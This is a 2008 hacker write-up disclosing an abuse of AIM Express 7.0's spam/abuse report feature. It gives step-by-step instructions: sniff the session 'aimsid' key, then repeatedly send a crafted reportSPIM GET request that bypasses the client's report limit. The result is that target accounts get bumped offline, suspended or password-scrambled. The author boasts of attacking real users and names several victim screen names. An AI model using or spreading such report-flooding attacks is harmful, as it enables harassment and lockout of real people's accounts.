#######################[yayo.org]###################################
###########[yayo.org]#####################################################
## ##
## [+] vulnerable software: aim express 7.0 ##
## [+] discovered by: pad aka padillac escobar ##
## ##
## [+] capabilities: bumping, password scrambling, account suspension ##
## [+] discovered on: 08/20/08 ##
## [+] partially patched on: 09/09/08 ##
## ##
## [+] notes: a few people have been asking for an explanation as to ##
## how i have been able to bump, reset and suspend aims ##
## over the past 22 days, but as i have been helping aol ##
## patch the exploit, i concluded that it would be ##
## unethical to fully disclose details of how it is done ##
## until the hole had begun being patched, and now ##
## that it has been, i invite you to read this text and ##
## learn the full details behind it all. yes, i’m aware ##
## that “aol hacking” is an art now considered as dead as ##
## it is lame, but in my defense this hole took me no ##
## longer than 10 minutes to discover. ##
## ##
###########[yayo.org]#####################################################
#############################[yayo.org]###################################
i coded an application entitled “padillac’s aim bump v1” to do all
of this work for me, but here are the technical details behind it:
equip yourself with the packet sniffer of your choice
(wireshark, live http headers for firefox, etc) and navigate to the
new aim express 7.0 page
http://o.aolcdn.com/aim/gromit/gm/aim_express/080815.1/WidgetMain.html
sign in with an active aim screen name and wait for the response
data which includes your unique “aimsid” key, and will look
something like this: 001.34576232342.2073485731:example, “example”
is where your screen name would show up.
using aim express, send an instant message to your target.
even if your target has privacy settings enabled and you are unable to
send the instant message, he/she is now vulnerable to your attack.
send the following to api.oscar.aol.com on port 80 numerous times
GET /im/reportSPIM?f=amf3&aimsid=[aimsid-here]&r=1&t=[target-here]&spimType=abuse&spimEvent=user HTTP/1.0
Host: api.oscar.aol.com
see spimType=abuse? that’s right, we’re exploiting their “report”
feature for instant message spam and abuse. at this point in your
aim express session the “report” button will be disabled, but that
doesn’t stop us from submitting abuse reports directly to the server.
there are two submission options for spimType, “spimType=spim” and
“spimType=abuse”. if your target has not sent you an instant message,
sending the above header with “spimType=spim” will return this error:
Target not allowed. The evilee had not previously acted on the eviler.
but when we select “spimType=abuse” this error does not occur.
it appears some of aol’s developers forgot the harsh reality
that for someone to “abuse” someone else over aol instant messenger,
they must first send an abusive instant message to that person.
now that we have submitted a number of abuse reports to aol, the
next time our target sends an instant message to anyone, be it you
or the queen of england, he/she will receive the following error message:
“your screen name has been signed on from another location”
he/she will be bumped offline immediately, and unable
to sign back on for 1 to 5 minutes.
i was capable of suspending and/or password scrambling aim accounts with
this flaw by targeting the same person over and over again. changing the
&r=1 value to &r=2, &r=3, &r=4 and so on after each abuse report
submission. aim express 7.0 causes the “r=” value to raise 1 digit per
abuse submission, but to my knowledge limits you to only 2 abuse report
submissions per session. directly submitting these abuse report headers
to the server bypasses this limitation.
and if you’re curious, “disgust” was suspended (unsuspended now), “dianaz”,
“anything” and “bangin” were password scrambled.
thanks for reading.
love,
pad